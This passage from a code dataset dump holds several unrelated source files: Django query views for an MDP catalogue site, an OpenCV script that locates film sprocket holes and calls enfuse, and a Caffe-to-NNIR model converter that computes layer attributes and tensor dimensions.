include/exclude. 
Now we just need to AND or\n # OR the resultant generated queries together.\n if \"&\" in operator:\n queries &= reg_queries\n queries &= best_queries\n print(queries)\n else:\n queries |= reg_queries\n queries |= best_queries\n # Check in mdp_advanced for the explanation of this statement.\n if not options1 and not options2 and not options3:\n queries = Q(**{\"measure_id\": None})\n\n results = QualityMeasure.objects.filter(queries).values('measure_id', 'measure_name')\n # print(len(results), results)\n return render(request, \"qmadvanced.html\",\n {\n \"parameter_text\": parameter_text, \"qm_fieldnames\": qm_fieldnames,\n \"field_vals\": list(qm_fieldnames.values()),\n \"filter_options\": filter_options, \"results\": results,\n \"range_options\": range_options, \"best_options\": best_query_strings,\n \"range_strings\": regquery_strings, 'reroute_string': 'qmbasic'\n })\n\ndef taskadvanced(request):\n # This will be a dictionary. The key is going to be the trivial string that will be passed to the query_generator.\n # The values are going to be 2-element lists that have the id of the element from the respective table and also\n # the string to be displayed on the webpage.\n\n # CAUTION. The order in which key-value pairs are being added to the dictionary below is important. They must follow\n # the same order as in task_fieldnames, which gives the string display names. This is because in the template, the\n # loop counters are synced for fetching data, assigning ids, etc. Just don't change the order, that's all. Or if you\n # do, modify the order in task_fieldnames too.\n task_fieldoptions = {}\n task_types = list(TaskType.objects.all().values_list('id', 'type_name'))\n task_fieldoptions['task_type'] = task_types\n # print(task_types)\n spaces = list(Task.objects.all().values_list('input_space', 'output_space'))\n input_space_ids, output_space_ids = [i[0] for i in spaces], [i[1] for i in spaces]\n input_space_objects = list((MathJaxFormulas.objects.filter(id__in=input_space_ids)).values_list('id', 'mathjaxeqn'))\n # print(input_space_objects)\n output_space_objects = list((MathJaxFormulas.objects.filter(id__in=output_space_ids)).values_list(\n 'id', 'mathjaxeqn')\n )\n task_fieldoptions['in_sp'] = input_space_objects\n task_fieldoptions['out_sp'] = output_space_objects\n ts_options = list(MathJaxFormulas.objects.filter(equation_type_id=4).values_list('id', 'mathjaxeqn'))\n # print(ts_options)\n task_fieldoptions['actor'] = [(\"U\", \"User\"), (\"M\", \"Machine\"), (\"UnM\", \"User & Machine\")]\n task_fieldoptions['ts_opt'] = ts_options\n regquery_strings = []\n for key, values in task_fieldoptions.items():\n temp = []\n for value in values:\n # value[0] is the id of the object and key is the trivial string.\n temp.append(key + str(value[0]))\n regquery_strings.append(temp)\n print(regquery_strings)\n # print(task_fieldoptions)\n query_sets = []\n option_set = []\n operator = get_operator(request)\n trivial_strings = list(task_fieldoptions.keys())\n index = 0\n for _, field_name in task_fieldnames:\n reg_queries, options = reg_query_generator_fn(request, regquery_strings[index],\n trivial_string=trivial_strings[index], field_name=field_name)\n index += 1\n query_sets.append(reg_queries)\n option_set.append(options)\n combined_query = Q()\n for query_set in query_sets:\n if \"&\" in operator:\n combined_query &= query_set\n else:\n combined_query |= query_set\n flag = 1\n for options in option_set:\n if options:\n flag = 0\n break\n if flag == 1:\n combined_query = Q(**{\"task_id\": 
None})\n print(combined_query)\n results = Task.objects.filter(combined_query).values('task_id', 'task_name')\n # print(len(results), results)\n return render(request, \"taskadvanced.html\",\n {\n \"task_fieldnames\": task_fieldnames, \"task_fieldoptions\": task_fieldoptions,\n \"filter_options\": filter_options, \"results\": results,\n \"query_strings\": regquery_strings, \"reroute_string\": \"taskbasic\",\n })\n\ndef lang_langs(request, pk=None):\n # https://www.revsys.com/tidbits/tips-using-djangos-manytomanyfield/\n # I'm going to be mapping backwards in this function. Instead of finding the languages I'm going to be using the\n # language to find the related mdps that can be handled. Django has a way to achieve this without having to iterate\n # through every single MDP and check their lists. The language object knows what mdp objects have a relation onto it\n # this list of objects can be obtained as a queryset by accessing the parameter specified by the related name in the\n # main table. i.e. In MDPsForLangs, circle_list has the related_name toolboxes. So to get the mdps that can be\n # handled using this toolbox, I need to just use language_retd.toolboxes.all(). similarly language_retd.libs.all()\n\n data = Languages.objects.values('language_name', 'language_id').order_by('language_id')\n try:\n language_retd = Languages.objects.get(language_id=pk)\n # .distinct() will handle any duplicates\n mdps_handled = (language_retd.toolboxes.all() | language_retd.libs.all()).distinct()\n\n # mdps_handled = []\n # for mdp_object in all_mdps_handled:\n # # Getting the list of querysets containing toolboxes and libraries separately\n # mdp_langs = [i.all() for i in getvalues(mdp_object, ['circle_list', 'square_list'])]\n # for query_set in mdp_langs:\n # # if language_retd in query_set:\n # # mdps_handled.append(mdp_object)\n # # If I've already found it in the first i.e. 
toolboxes queryset I don't want to search libraries also.\n # if query_set.filter(language_id=pk).exists():\n # mdps_handled.append(mdp_object)\n # break\n description = language_retd.description\n toolboxes_suppd = language_retd.toolboxes_suppd.all()\n\n return render(request, 'lang_langs.html',\n {\"language_list\": data, \"description\": description,\n \"lang_name\": language_retd.language_name,\n \"toolboxes_suppd\": toolboxes_suppd, \"mdps_handled\": mdps_handled,\n \"reroute_string\": \"lang_mdps\",\n \"got_item\": True,\n }\n )\n except ObjectDoesNotExist:\n return render(request, 'lang_langs.html',\n {\"language_list\": data, \"got_item\": False,\n \"reroute_string\": \"lang_langs\"})\n\ndef enrichbasic(request, pk=None):\n type_objects = EnrichmentType.objects.all()\n type_strings = list(type_objects.values_list('type_name', flat=True))\n enrich_dict = {}\n for index in range(len(type_strings)):\n type_name = type_strings[index]\n type_object = type_objects[index]\n enrich_dict[type_name] = Enrichment.objects.filter(enrichment_type=type_object)\n try:\n enrichment_retd = Enrichment.objects.get(enrichment_id=pk)\n references = enrichment_retd.references.all()\n return render(request, 'enrichbasic.html',\n {'enrichment_info': enrich_dict,\n \"enrichment_retd\": enrichment_retd,\n \"references\": references, \"got_item\": True,\n \"reroute_string\": \"enrichbasic\"\n }\n )\n except ObjectDoesNotExist:\n return render(request, 'enrichbasic.html',\n {'enrichment_info': enrich_dict,\n \"got_item\": False, \"reroute_string\": 'enrichbasic'\n }\n )\n\ndef do_nothing(request):\n return render(request, 'introduction.html')\n\n\n","repo_name":"Sharpfawkes/DB4MDP_NEW","sub_path":"mdp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":33406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"20781472013","text":"import cv2 as cv\nimport numpy as np\nimport os\nimport subprocess\n\ndef OutputFolder() -> str:\n # Create folders for the different EV exposure levels\n \n # Image Output path - create if needed\n path = os.path.join(os.getcwd(), \"Capture\")\n\n if not os.path.exists(path):\n raise FileNotFoundError(path)\n\n return path\n\n\ndef DetectSproketHoleByTemplate(template, img):\n sproket_mask = np.zeros(img.shape[:2], dtype=\"uint8\")\n image_height, image_width = img.shape[:2]\n # top-left corner and bottom-right corner\n cv.rectangle(sproket_mask, (200, 380), (420, 650), 255, -1)\n img = cv.bitwise_and(img, img, mask=sproket_mask)\n\n matrix = (3, 9)\n imgGry = cv.cvtColor(img, cv.COLOR_BGR2GRAY)\n\n template = cv.imread('sproket_hole_template.png',None)\n templateGry = cv.cvtColor(template, cv.COLOR_BGR2GRAY)\n w, h = template.shape[:2]\n\n res = cv.matchTemplate(imgGry,templateGry,cv.TM_CCORR_NORMED)\n min_val, max_val, min_loc, max_loc = cv.minMaxLoc(res)\n\n #print(min_val, max_val, min_loc, max_loc)\n\n top_left = max_loc\n bottom_right = (top_left[0] + h, top_left[1] + w)\n return top_left,bottom_right\n\n#CAMERA_EXPOSURE = [-8.0,-4.0,-10.0]\nCAMERA_EXPOSURE = [-8.0]\n\npath=OutputFolder()\n\ntemplate = cv.cvtColor(cv.imread('sproket_hole_template.png',None), cv.COLOR_BGR2GRAY)\n\n\nfor frame_number in range(0,21+1):\n print(\"Frame\",frame_number)\n\n cmd_line=[]\n cmd_line.append(\"e:\\source\\enblend-4.2\\enfuse.exe\")\n cmd_line.append(\"-l\")\n cmd_line.append(\"8\")\n cmd_line.append(\"-o\")\n cmd_line.append(os.path.join(path, \"frame_{:08d}.png\".format(frame_number)))\n\n for my_exposure in 
CAMERA_EXPOSURE:\n filename = os.path.join(path+\"{0}\".format(my_exposure), \"frame_{:08d}.png\".format(frame_number))\n\n cmd_line.append(filename)\n\n if not os.path.exists(filename):\n raise FileNotFoundError(filename)\n\n #Load the source image\n img = cv.imread(filename,None)\n # Roughly detect the sproket hole by template image\n #top_left,bottom_right = DetectSproketHoleByTemplate(template, img)\n #print(top_left,bottom_right)\n\n top_left=(237,410)\n bottom_right=(389,603)\n\n # Create mask over sproket hole\n sproket_mask = np.zeros(img.shape[:2], dtype=\"uint8\")\n image_height, image_width = img.shape[:2]\n # Expand the mask rectangle\n PADDING=16\n top_left = (top_left[0]-PADDING,top_left[1]-PADDING)\n bottom_right = (bottom_right[0]+PADDING,bottom_right[1]+PADDING)\n # top-left corner and bottom-right corner\n cv.rectangle(sproket_mask, top_left, bottom_right, 255, -1)\n # Apply the mask to original image, leaving only the sproket hole visible\n sproket_hole = cv.bitwise_and(img, img, mask=sproket_mask)\n\n # Convert to gray and blur\n matrix = (5, 5)\n sproket_hole = cv.cvtColor(cv.GaussianBlur(sproket_hole, matrix, 0), cv.COLOR_BGR2GRAY)\n\n sproket_hole = cv.equalizeHist(sproket_hole)\n\n # Threshold\n _, threshold = cv.threshold(sproket_hole, 155, 255, cv.THRESH_BINARY)\n\n canny_edges = cv.Canny(threshold, 100, 200)\n\n contours, _ = cv.findContours(canny_edges, cv.RETR_EXTERNAL, cv.CHAIN_APPROX_NONE)\n\n # Sort by area, largest first (hopefully our sproket - we should only have 1 full sprocket in view at any 1 time)\n contour = sorted(contours, key=lambda x: cv.contourArea(x), reverse=True)[0]\n\n area = cv.contourArea(contour)\n rect = cv.minAreaRect(contour)\n rotation = rect[2]\n centre = rect[0]\n # Gets center of rotated rectangle\n box = cv.boxPoints(rect)\n # Convert dimensions to ints\n box = np.int0(box)\n colour = (0, 0, 0)\n cv.drawContours(img, [contour], -1,color=colour, thickness=cv.FILLED)\n \n # Check we have the top left and not bottom left\n if box[0][0] 0:\n weight_blob_proto = layer_parameter.blobs[0]\n weight_blob_name = caffe_name_to_ir_name(layer_name + '_w')\n if (verbose):\n print (weight_blob_name)\n buf = convert_caffe_bin_to_ir_bin(weight_blob_proto.data)\n graph.addBinary(weight_blob_name, buf)\n\n if blob_size > 1:\n bias_blob_proto = layer_parameter.blobs[1]\n bias_blob_name = caffe_name_to_ir_name(layer_name + '_b')\n if (verbose):\n print (bias_blob_name)\n buf = convert_caffe_bin_to_ir_bin(bias_blob_proto.data)\n graph.addBinary(bias_blob_name, buf)\n\n# extracting input from caffe network and converting into ir input.\ndef extractInput(net_parameter, graph, input_dims):\n inputList = {}\n if (len(net_parameter.layer) == 0):\n layers = net_parameter.layers\n else:\n layers = net_parameter.layer\n first_layer_param = layers[0]\n first_layer_param_type = first_layer_param.type\n input_name = \"\"\n if len(net_parameter.input) != 0:\n input_name = caffe_name_to_ir_name(net_parameter.input[0])\n elif (first_layer_param_type == \"Data\" or first_layer_param_type == \"Input\" or first_layer_param_type == \"ImageData\"):\n top_list = first_layer_param.top\n if (len(top_list) == 0):\n input_name = caffe_name_to_ir_name(first_layer_param.name)\n else:\n input_name = caffe_name_to_ir_name(top_list[0])\n else:\n bottom_list = first_layer_param.bottom\n if (len(bottom_list) == 0):\n top_list = first_layer_param.top\n input_name = caffe_name_to_ir_name(top_list[0])\n else:\n input_name = caffe_name_to_ir_name(bottom_list[0])\n\n 
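`convert_caffe_bin_to_ir_bin` is called above but not shown in this excerpt; presumably it flattens the blob's repeated float `data` field into raw bytes for `graph.addBinary`. A hedged sketch of such a helper (the little-endian float32 layout is an assumption about the NNIR binary format, not confirmed here):

```python
import struct

def convert_caffe_bin_to_ir_bin(data):
    # Pack a protobuf repeated-float field into contiguous
    # little-endian float32 bytes; the byte layout is assumed.
    return struct.pack('<%df' % len(data), *data)
```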
inputList[str(input_name)] = input_dims\n graph.addInput(caffe_blob_to_ir_tensor(input_name, \"F032\", input_dims))\n return inputList\n\n# extraction of output from caffe network to ir output.\ndef extractOutput(graph, inputOutputLayers, output_list, verbose):\n outputList = {}\n if (len(output_list) == 1):\n last_layer_index = len(inputOutputLayers) - 1\n last_layer_info = inputOutputLayers[last_layer_index]\n output_map = last_layer_info[\"outputs\"]\n output_name = list(output_map.keys())[0]\n if (verbose):\n print (\"output name is : \" + output_name)\n output_dims = output_map[output_name]\n graph.addOutput(caffe_blob_to_ir_tensor(output_name, \"F032\", output_dims))\n outputList[output_name] = output_dims\n else:\n for i in range(len(output_list)):\n output_name = output_list[i]\n if (verbose):\n print (\"output name at index: \"+ str(i) + \" \" + output_name)\n for j in range(len(inputOutputLayers)):\n if (output_name in inputOutputLayers[j][\"layer_name\"]):\n output_map = inputOutputLayers[j][\"outputs\"]\n output_dims = output_map[output_name]\n graph.addOutput(caffe_blob_to_ir_tensor(output_name, \"F032\", output_dims))\n outputList[output_name] = output_dims\n break\n return outputList\n\n# extract layer attribute information from caffe layers.\ndef extractCaffeAttrInfo(layer_param):\n if(type(layer_param) == caffe_pb2.V1LayerParameter):\n layer_type = convertV1LayerTypeToString(layer_param)\n else:\n layer_type = layer_param.type\n attribute_map = {}\n if (layer_type == \"Convolution\" or layer_type == \"Deconvolution\"):\n conv = layer_param.convolution_param\n pad_h = conv.pad_h if (conv.HasField('pad_h')) else (int(conv.pad[0]) if (len(conv.pad) > 0) else 0)\n pad_w = conv.pad_w if (conv.HasField('pad_w')) else (int(conv.pad[1]) if (len(conv.pad) > 1) else pad_h)\n stride_h = conv.stride_h if (conv.HasField('stride_h')) else (int(conv.stride[0]) if (len(conv.stride) > 0) else 1)\n stride_w = conv.stride_w if (conv.HasField('stride_w')) else (int(conv.stride[1]) if (len(conv.stride) > 1) else stride_h)\n kernel_h = conv.kernel_h if (conv.HasField('kernel_h')) else (int(conv.kernel_size[0]) if (len(conv.kernel_size) > 0) else 0)\n kernel_w = conv.kernel_w if (conv.HasField('kernel_w')) else (int(conv.kernel_size[1]) if (len(conv.kernel_size) > 1) else kernel_h)\n dilation_h = conv.dilation[0] if (len(conv.dilation) > 0) else 1\n dilation_w = conv.dilation[1] if (len(conv.dilation) > 1) else dilation_h\n groups = conv.group if (conv.HasField('group')) else 1\n\n attribute_map[\"strides\"] = [stride_w, stride_h]\n attribute_map[\"kernel_shape\"] = [kernel_w, kernel_h]\n attribute_map[\"group\"] = groups\n attribute_map[\"pads\"] = [pad_w, pad_h, pad_w, pad_h]\n attribute_map[\"dilations\"] = [dilation_w, dilation_h]\n\n elif (layer_type == \"Pooling\"):\n pooling = layer_param.pooling_param\n pad_h = int(pooling.pad_h) if (pooling.HasField('pad_h')) else int(pooling.pad)\n pad_w = int(pooling.pad_w) if (pooling.HasField('pad_w')) else int(pooling.pad)\n stride_h = int(pooling.stride_h) if (pooling.HasField('stride_h')) else int(pooling.stride)\n stride_w = int(pooling.stride_w) if (pooling.HasField('stride_w')) else int(pooling.stride)\n kernel_h = int(pooling.kernel_h) if (pooling.HasField('kernel_h')) else int(pooling.kernel_size)\n kernel_w = int(pooling.kernel_w) if (pooling.HasField('kernel_w')) else int(pooling.kernel_size)\n\n attribute_map[\"strides\"] = [stride_w, stride_h]\n attribute_map[\"kernel_shape\"] = [kernel_w, kernel_h]\n attribute_map[\"pads\"] = [pad_w, 
pad_h, pad_w, pad_h]\n attribute_map[\"dim_round_mode\"] = \"ceil\"\n #attribute_map[\"dilations\"] = [1,1]\n\n elif (layer_type == \"LRN\"):\n lrn = layer_param.lrn_param\n local_size = int(lrn.local_size)\n alpha = float(lrn.alpha)\n beta = float(lrn.beta)\n k = float(lrn.k)\n norm_region = lrn.norm_region\n\n attribute_map[\"alpha\"] = alpha\n attribute_map[\"beta\"] = beta\n attribute_map[\"size\"] = local_size\n attribute_map[\"bias\"] = k\n if (norm_region == caffe_pb2.LRNParameter.ACROSS_CHANNELS):\n attribute_map[\"mode\"] = 1\n elif (norm_region == caffe_pb2.LRNParameter.WITHIN_CHANNEL):\n attribute_map[\"mode\"] = 0\n\n elif (layer_type == \"BatchNorm\"):\n attribute_map[\"epsilon\"] = float(layer_param.batch_norm_param.eps)\n\n elif (layer_type == \"InnerProduct\"):\n attribute_map[\"broadcast\"] = 1\n attribute_map[\"transB\"] = 1\n elif (layer_type == \"ReLU\"):\n relu = layer_param.relu_param\n slope = relu.negative_slope\n attribute_map[\"alpha\"] = slope\n elif (layer_type == \"Interp\"):\n if layer_param.python_param.param_str != '':\n python_param_str = eval(layer_param.python_param.param_str)\n zoom_factor = int(python_param_str[\"zoom_factor\"])\n else:\n zoom_factor = 2 #default value\n attribute_map[\"zoom_factor\"] = zoom_factor\n elif (layer_type == \"Crop\"):\n crop = layer_param.crop_param\n axis = crop.axis if (crop.HasField('axis')) else 2\n offset = crop.offset\n new_offset = []\n\n for i in range(4):\n if (i < axis):\n new_offset.append(0)\n else:\n if (len(offset) == 1):\n new_offset.append(offset[0]) \n else:\n new_offset.append(offset[i-axis])\n\n attribute_map[\"axis\"] = axis\n attribute_map[\"offset\"] = new_offset\n\n elif (layer_param.type == \"Reshape\"):\n reshape = layer_param.reshape_param\n shape = reshape.shape.dim\n new_shape = [int(z) for z in shape]\n attribute_map[\"shape\"] = new_shape\n\n elif (layer_param.type == \"Concat\"):\n concat = layer_param.concat_param\n axis = concat.axis\n attribute_map[\"axis\"] = axis\n\n elif (layer_param.type == \"DetectionOutput\"):\n detection_output = layer_param.detection_output_param\n num_classes = detection_output.num_classes\n share_location = detection_output.share_location\n background_label_id = detection_output.background_label_id\n nms_threshold = detection_output.nms_param.nms_threshold\n top_k = detection_output.nms_param.top_k\n code_type = detection_output.code_type\n variance_encoded_in_target = detection_output.variance_encoded_in_target\n keep_top_k = detection_output.keep_top_k\n confidence_threshold = detection_output.confidence_threshold\n attribute_map[\"num_classes\"] = num_classes\n attribute_map[\"share_location\"] = 1 if share_location == True else 0\n attribute_map[\"background_label_id\"] = background_label_id\n attribute_map[\"nms_threshold\"] = nms_threshold\n attribute_map[\"top_k\"] = top_k\n attribute_map[\"code_type\"] = code_type\n attribute_map[\"variance_encoded_in_target\"] = 1 if variance_encoded_in_target == True else 0\n attribute_map[\"keep_top_k\"] = keep_top_k\n attribute_map[\"confidence_threshold\"] = confidence_threshold\n \n elif (layer_param.type == \"Softmax\"):\n softmax = layer_param.softmax_param\n axis = softmax.axis\n attribute_map[\"axis\"] = axis\n \n return attribute_map\n\n# calculate dimensions of the output of each layer.\ndef calculateTensorDims(layer_param, input_map, attribute_map):\n dimList = {}\n output_dims = [0, 0, 0, 0]\n inputs = list(input_map.keys())\n if(type(layer_param) == caffe_pb2.V1LayerParameter):\n layer_type = 
convertV1LayerTypeToString(layer_param)\n else:\n layer_type = layer_param.type\n if(layer_type == \"Convolution\"):\n strides = attribute_map[\"strides\"]\n pads = attribute_map[\"pads\"]\n dilations = attribute_map[\"dilations\"]\n kernel_shape = attribute_map[\"kernel_shape\"]\n group = attribute_map[\"group\"]\n n,c,h,w = input_map[inputs[0]]\n output_dims[3] = ((int(w) + 2 * pads[0] - kernel_shape[0] - (kernel_shape[0] - 1) * (dilations[0] - 1))// strides[0]) + 1\n output_dims[2] = ((int(h) + 2 * pads[1] - kernel_shape[1] - (kernel_shape[1] - 1) * (dilations[1] - 1))// strides[1]) + 1\n output_dims[1] = layer_param.convolution_param.num_output\n output_dims[0] = n\n weight_dims = [output_dims[1], old_div(int(c),group), kernel_shape[1], kernel_shape[0]]\n dimList[\"weights\"] = weight_dims\n if (layer_param.convolution_param.bias_term):\n bias_dims = [weight_dims[0]]\n dimList[\"bias\"] = bias_dims\n\n elif (layer_type == \"Deconvolution\"):\n strides = attribute_map[\"strides\"]\n pads = attribute_map[\"pads\"]\n dilations = attribute_map[\"dilations\"]\n kernel_shape = attribute_map[\"kernel_shape\"]\n n,c,h,w = input_map[str(inputs[0])]\n\n output_dims[3] = strides[0] * (w - 1) + dilations[0] * (kernel_shape[0] - 1) + 1 - (2 * pads[0])\n output_dims[2] = strides[1] * (h - 1) + dilations[1] * (kernel_shape[1] - 1) + 1 - (2 * pads[1])\n output_dims[1] = layer_param.convolution_param.num_output\n output_dims[0] = n\n weight_dims = [output_dims[1], c, kernel_shape[1] , kernel_shape[0]]\n dimList[\"weights\"] = weight_dims\n if (layer_param.convolution_param.bias_term):\n bias_dims = [weight_dims[0]]\n dimList[\"bias\"] = bias_dims\n\n elif (layer_type == \"Pooling\"):\n strides = attribute_map[\"strides\"]\n pads = attribute_map[\"pads\"]\n kernel_shape = attribute_map[\"kernel_shape\"]\n n,c,h,w = input_map[str(inputs[0])]\n if (layer_param.pooling_param.global_pooling):\n kernel_shape[1] = h\n kernel_shape[0] = w\n pads[0] = 0\n pads[1] = 0\n strides[0] = 1\n strides[1] = 1\n\n output_dims[3] = int(math.ceil(float(w + 2 * pads[0] + strides[0] - kernel_shape[0])/strides[0]))\n output_dims[2] = int(math.ceil(float(h + 2 * pads[1] + strides[1] - kernel_shape[1])/strides[1]))\n if (pads[1] > 0):\n if (output_dims[2] - 1) * strides[1] >= (h + pads[1]):\n output_dims[2] = output_dims[2] - 1\n if (pads[0] > 0):\n if (output_dims[3] - 1) * strides[0] >= (w + pads[0]):\n output_dims[3] = output_dims[3] - 1\n output_dims[1] = c\n output_dims[0] = n\n\n elif (layer_type == \"InnerProduct\"):\n n,c,h,w = input_map[str(inputs[0])]\n output_dims[3] = 1\n output_dims[2] = 1\n output_dims[1] = layer_param.inner_product_param.num_output\n output_dims[0] = n\n weight_dims = [output_dims[1], c, h, w]\n dimList[\"weights\"] = weight_dims\n if (layer_param.inner_product_param.bias_term):\n dimList[\"bias\"] = [weight_dims[0]]\n\n elif (layer_type == \"Concat\"):\n inputs = list(input_map.keys())\n axis = attribute_map[\"axis\"]\n if axis == 1:\n for i in range(len(inputs)):\n n,c,h,w = input_map[inputs[i]]\n output_dims[1] += c\n n,c,h,w = input_map[inputs[0]]\n output_dims[0] = n\n output_dims[2] = h\n output_dims[3] = w\n elif axis == 2:\n for i in range(len(inputs)):\n n,c,h,w = input_map[inputs[i]]\n output_dims[2] += h\n n,c,h,w = input_map[inputs[0]]\n output_dims[0] = n\n output_dims[1] = c\n output_dims[3] = w\n\n elif (layer_type == \"Interp\"):\n inputs = list(input_map.keys())\n zoom_factor = attribute_map[\"zoom_factor\"]\n for i in range(len(inputs)):\n n,c,h,w = input_map[inputs[i]]\n 
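As a quick sanity check of the Convolution branch above, the width/height expression is the standard dilated-convolution output size. Plugging in a 224-wide input with kernel 3, stride 2, pad 1, dilation 1 gives 112:

```python
def conv_out_dim(size, kernel, stride, pad, dilation=1):
    # Same expression as the Convolution branch of calculateTensorDims.
    return (size + 2 * pad - kernel - (kernel - 1) * (dilation - 1)) // stride + 1

assert conv_out_dim(224, kernel=3, stride=2, pad=1) == 112
assert conv_out_dim(224, kernel=7, stride=2, pad=3) == 112
```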
n,c,h,w = input_map[inputs[0]]\n output_dims[0] = n\n output_dims[1] = c\n output_dims[2] = h*zoom_factor\n output_dims[3] = w*zoom_factor\n #print('INFO: Found Layertype Interp with zoom '+ str(zoom_factor))\n\n elif (layer_type == \"BatchNorm\" or layer_param.type == \"Scale\"):\n output_dims[0], output_dims[1], output_dims[2], output_dims[3] = input_map[str(inputs[0])]\n if (len(layer_param.blobs) > 0):\n weight_dims = [output_dims[1]]\n dimList[\"weights\"] = weight_dims\n if (len(layer_param.blobs) > 1):\n bias_dims = [output_dims[1]]\n dimList[\"bias\"] = bias_dims\n \n elif (layer_type == \"Crop\"):\n inputs = list(input_map.keys())\n axis = attribute_map[\"axis\"]\n new_axis = 3 - axis\n\n for i in range(4):\n if (i <= new_axis):\n output_dims[i] = input_map[inputs[0]][i]\n else:\n output_dims[i] = input_map[inputs[1]][i]\n\n elif (layer_type == \"Permute\"):\n permute = layer_param.permute_param\n order = permute.order \n order = [int(i) for i in order]\n attribute_map[\"order\"] = order\n n,c,h,w = input_map[str(inputs[0])]\n if order == [0, 2, 3, 1]:\n output_dims[0] = n\n output_dims[1] = h\n output_dims[2] = w\n output_dims[3] = c\n if order == [0, 1, 2, 3]:\n output_dims[0] = n\n output_dims[1] = c\n output_dims[2] = h\n output_dims[3] = w\n\n elif (layer_type == \"PriorBox\"):\n n,c,h,w = input_map[str(inputs[0])]\n prior_box = layer_param.prior_box_param\n min_size = prior_box.min_size[0]\n attribute_map[\"min_size\"] = min_size\n max_size = prior_box.max_size[0] if prior_box.max_size else 0.0\n attribute_map[\"max_size\"] = max_size\n aspect_ratio = []\n for i in range(len(prior_box.aspect_ratio)):\n aspect_ratio.append(prior_box.aspect_ratio[i])\n attribute_map[\"aspect_ratio\"] = aspect_ratio\n flip = int(prior_box.flip)\n attribute_map[\"flip\"] = flip\n clip = int(prior_box.clip)\n attribute_map[\"clip\"] = clip\n variance = []\n for i in range(len(prior_box.variance)):\n variance.append(prior_box.variance[i])\n attribute_map[\"variance\"] = variance\n offset = float(prior_box.offset)\n attribute_map[\"prior_offset\"] = offset\n dim = 1 #for min_size\n dim += len(aspect_ratio)\n if max_size > 0:\n dim += 1\n if flip == 1:\n dim += len(aspect_ratio)\n output_dims[0] = 1\n output_dims[1] = 2 #for mean and variance values\n output_dims[2] = h * w * dim * 4 \n output_dims[3] = 1\n \n elif (layer_type == \"Flatten\"):\n flatten = layer_param.flatten_param \n axis = flatten.axis\n attribute_map[\"axis\"] = axis\n n,c,h,w = input_map[str(inputs[0])]\n output_dims[0] = n\n output_dims[1] = c*h*w\n output_dims[2] = 1\n output_dims[3] = 1\n elif (layer_type == \"Reshape\"):\n shape = attribute_map[\"shape\"]\n input_shape = input_map[str(inputs[0])]\n input_shape = [int(z) for z in input_shape]\n \n icount = 1\n ocount = 1\n\n for dim in range(len(input_shape)):\n icount *= input_shape[dim]\n for dim in range(len(shape)):\n if shape[dim] > 0:\n output_dims[dim] = shape[dim]\n ocount *= output_dims[dim]\n elif shape[dim] == 0:\n output_dims[dim] = input_shape[dim]\n ocount *= output_dims[dim]\n \n \n for dim in range(len(shape)):\n if shape[dim] == -1:\n output_dims[dim] = icount// ocount\n ocount *= output_dims[dim]\n\n for i in range(len(output_dims)): \n if output_dims[i] == 0: \n output_dims[i] = 1\n elif (layer_param.type == \"DetectionOutput\"):\n output_dims[0] = 1\n output_dims[1] = 1\n output_dims[2] = 1\n output_dims[3] = 7\n else:\n output_dims[0],output_dims[1],output_dims[2],output_dims[3] = input_map[str(inputs[0])]\n\n dimList[\"output\"] = output_dims\n\n return 
dimList\n\n\ndef convertV1LayerTypeToString(layer_param):\n EnumDescriptor = list(caffe_pb2.V1LayerParameter.LayerType.items())\n for item in EnumDescriptor:\n if layer_param.type == item[1]:\n layer_type_V1 = item[0]\n if layer_type_V1 == \"CONCAT\":\n layer_type = \"Concat\"\n elif layer_type_V1 == \"CONVOLUTION\":\n layer_type = \"Convolution\"\n elif layer_type_V1 == \"DATA\":\n layer_type = \"Data\"\n elif layer_type_V1 == \"DECONVOLUTION\":\n layer_type = \"Deconvolution\"\n elif layer_type_V1 == \"DROPOUT\":\n layer_type = \"Dropout\" \n elif layer_type_V1 == \"ELTWISE\":\n layer_type = \"Eltwise\"\n elif layer_type_V1 == \"FLATTEN\":\n layer_type = \"Flatten\"\n elif layer_type_V1 == \"IMAGE_DATA\":\n layer_type = \"ImageData\"\n elif layer_type_V1 == \"INNER_PRODUCT\":\n layer_type = \"InnerProduct\" \n elif layer_type_V1 == \"LRN\":\n layer_type = \"LRN\"\n elif layer_type_V1 == \"POOLING\":\n layer_type = \"Pooling\" \n elif layer_type_V1 == \"RELU\":\n layer_type = \"ReLU\" \n elif layer_type_V1 == \"SOFTMAX\":\n layer_type = \"Softmax\" \n elif layer_type_V1 == \"SOFTMAX_LOSS\":\n layer_type = \"SoftmaxWithLoss\"\n elif layer_type_V1 == \"SPLIT\":\n layer_type = \"Split\"\n elif layer_type_V1 == \"SLICE\":\n layer_type = \"Slice\"\n elif layer_type_V1 == \"SCALE\":\n layer_type = \"Scale\"\n else:\n layer_type = \"Unknown V1 Layer Type\"\n return layer_type\n\n# extract caffe node information into ir nodes.\ndef extractCaffeNodeInfo(net_parameter, graph, inputsInfo, verbose):\n inputOutputMap = collections.OrderedDict()\n dropoutLayerMap = {}\n splitLayerMap = {}\n outputNameAliasMap = {}\n inputsMap = {}\n outputsMap = {}\n count = 0\n _output_name = {}\n\n if (len(net_parameter.layer) == 0):\n layers = net_parameter.layers\n else:\n layers = net_parameter.layer\n\n for i in range(len(layers)):\n layer_param = layers[i]\n layer_name = caffe_name_to_ir_name(str(layer_param.name))\n if(type(layer_param) == caffe_pb2.V1LayerParameter):\n layer_type = convertV1LayerTypeToString(layer_param)\n else:\n layer_type = str(layer_param.type)\n \n inputs = layer_param.bottom\n outputs = layer_param.top\n # ignoring the input/data layer as input is already obtained in previous step.\n if (layer_type == \"Data\" or layer_type == \"ImageData\" or layer_type == \"Input\"):\n continue\n # find out all the outputs and store names\n for k in range(len(layer_param.bottom)):\n if layer_param.bottom[k] in _output_name:\n _output_name[layer_param.bottom[k]]['count'] = _output_name[layer_param.bottom[k]]['count']+1\n else:\n _output_name[layer_param.bottom[k]] = {'count':0}\n for k in range(len(layer_param.top)):\n if layer_param.top[k] in _output_name:\n _output_name[layer_param.top[k]]['count'] = _output_name[layer_param.top[k]]['count']+1\n else:\n _output_name[layer_param.top[k]] = {'count':0, 'name':layer_name}\n\n # dropout layer is copy layer in inference, hence aliasing the input for dropout layer for next layer.\n if (layer_type == \"Dropout\"):\n in_name = caffe_name_to_ir_name(str(inputs[0]))\n if in_name in outputNameAliasMap:\n in_name = outputNameAliasMap[in_name]\n dropoutLayerMap[caffe_name_to_ir_name(str(outputs[0]))] = in_name\n continue\n\n # split layer optimization.\n if (layer_type == \"Split\"):\n in_name = caffe_name_to_ir_name(str(inputs[0]))\n if (in_name in outputNameAliasMap):\n 